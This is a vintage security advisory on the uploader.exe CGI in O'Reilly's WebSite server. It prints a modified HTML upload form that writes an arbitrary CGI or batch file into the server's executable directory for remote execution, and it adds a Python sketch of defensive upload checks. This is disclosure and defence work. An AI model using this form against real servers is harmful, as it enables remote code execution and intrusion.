COMMAND

    uploader.exe

SYSTEMS AFFECTED

    Win NT

PROBLEM

    Herman de Vette found the following.  O'Reilly's web server
    'WebSite' contains a demo package that includes the CGI program
    uploader.exe.  The following HTML page was included with it:

    <HTML><HEAD><TITLE>Upload a File</TITLE></HEAD>

    <BODY>

    <H1>Upload a file</H1>

    <hr>

    <h2>NOTE: Your browser must support file uploading.</H2>

    <FORM ENCTYPE="multipart/form-data" METHOD=POST
    ACTION="/cgi-win/uploader.exe/Uploads/">

    <PRE>Your name:        <INPUT TYPE=TEXT SIZE=20 NAME="name"> (required)

    Email address:    <INPUT TYPE=TEXT SIZE=20 NAME="email"> (required)

                      <b>NOTE:</b> If you don't see a "browse" button below,
    your browser doesn't support form-based file uploading. Netscape 2.0 and
    later have this support.

    File to upload:   <INPUT TYPE=FILE NAME="upl-file" SIZE=40>

    File description: <INPUT TYPE=TEXT SIZE=40 NAME="desc"> (required)

                      <INPUT TYPE=SUBMIT VALUE="Upload Now"></PRE>

    </FORM>

    <HR>

    <A HREF="mailto:...">

    <address>...</address>

    </A></BODY></HTML>

    The program uploader.exe doesn't check anything at all.  If you're
    lucky, you're running Windows NT and have put only "read/execute
    access" on cgi-win and other executable paths.  Otherwise (Win95)
    you have a real problem.  You could create a CGI program, then
    change the HTML file a little, like this (note that the ACTION
    path after uploader.exe is now /cgi-win/ instead of /Uploads/):

    <HTML><HEAD><TITLE>Upload Any File Anywhere</TITLE></HEAD>

    <BODY>

    <FORM ENCTYPE="multipart/form-data" METHOD=POST
    ACTION="http://host.of.vulnerable.website/cgi-win/uploader.exe/cgi-win/">

      <INPUT TYPE=HIDDEN NAME="name" VALUE="Foo">

      <INPUT TYPE=HIDDEN NAME="email" VALUE="Foo@bar.com">

      File to upload: <INPUT TYPE=FILE NAME="upl-file" SIZE=40><BR>

      <INPUT TYPE=TEXT SIZE=40 NAME="desc" VALUE="YouGottaSecurityProblem">

      <INPUT TYPE=SUBMIT VALUE="Upload Now">

    </FORM>

    </BODY></HTML>

    Open the HTML file in your browser, select a nice CGI file to
    upload, and run that CGI program remotely.  (No need to tell you
    what this CGI program could do; it could be a .bat file too, in
    one of WebSite's other CGI directories.)

SOLUTION

    Remove uploader.exe, delete it, empty your trash bin and use FTP
    for file upload.  This hole existed prior to the July 1996
    revision of uploader.bas, when Mark Bracewell added a security
    fix.  The fix has been available since that time at

        http://software.ora.com/techsupport/software/updates.html

    The revised uploader was also included in WebSite 1.1g.  Note that
    at this time the current WebSite Professional 2.0 Beta is also
    vulnerable to the uploader.exe problem.
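
    The checks an upload CGI of this kind should make before writing
    anything, as an added example (not code from uploader.bas or from
    the July 1996 fix).  It assumes the destination arrives as the
    extra path after uploader.exe, as in the form's ACTION; the
    allow-lists, the upload root and all function names are
    hypothetical.

```python
import ntpath
import posixpath

# All three values are assumptions for this example, not WebSite settings.
ALLOWED_URL_DIRS = {"/uploads"}             # normalised, lower-case
UPLOAD_ROOT = r"C:\example\upload-root"     # placeholder directory
ALLOWED_EXTENSIONS = {".txt", ".gif", ".jpg", ".zip"}


class UploadRejected(Exception):
    """The request failed one of the checks below."""


def resolve_upload_target(path_info: str, client_filename: str) -> str:
    """Return the full path an upload may be written to, or raise."""
    # 1. Destination: collapse "..", "." and backslashes in the extra path
    #    info, then require an exact allow-list match.
    cleaned = path_info.replace("\\", "/").strip("/")
    url_dir = posixpath.normpath("/" + cleaned).lower()
    if url_dir not in ALLOWED_URL_DIRS:
        raise UploadRejected(f"destination not allowed: {path_info!r}")

    # 2. File name: keep only the last component the client sent; refuse
    #    stream/drive syntax and the trailing dots or spaces Windows drops.
    name = ntpath.basename(client_filename)
    if not name or ":" in name or name != name.rstrip(". "):
        raise UploadRejected(f"bad file name: {client_filename!r}")
    if ntpath.splitext(name)[1].lower() not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"file type not allowed: {name!r}")

    # 3. Containment: the final path must sit directly in the upload root.
    target = ntpath.normpath(ntpath.join(UPLOAD_ROOT, name))
    if ntpath.dirname(target).lower() != UPLOAD_ROOT.lower():
        raise UploadRejected(f"escapes upload root: {name!r}")
    return target


if __name__ == "__main__":
    # Constructed requests: (extra path info, file name sent by the browser).
    samples = [("/Uploads/", r"C:\docs\report.txt"),
               ("/cgi-win/", "report.txt"),
               ("/Uploads/../cgi-win/", "report.txt"),
               ("/Uploads/", "run.bat")]
    for info, fname in samples:
        try:
            print("accept", resolve_upload_target(info, fname))
        except UploadRejected as err:
            print("reject", err)
```

    File-system permissions on cgi-win and the other executable paths
    remain the backstop if a check like this is ever bypassed.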